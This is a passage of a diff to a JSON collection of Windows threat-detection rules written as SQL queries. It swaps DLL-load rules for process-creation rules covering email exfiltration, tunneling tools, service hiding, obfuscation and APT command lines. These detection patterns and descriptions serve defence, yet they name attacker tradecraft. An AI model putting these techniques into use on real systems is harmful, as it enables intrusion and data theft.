'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "status": "experimental", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.exfiltration" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", + "status": "test", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", + "status": "test", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "status": "experimental", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE 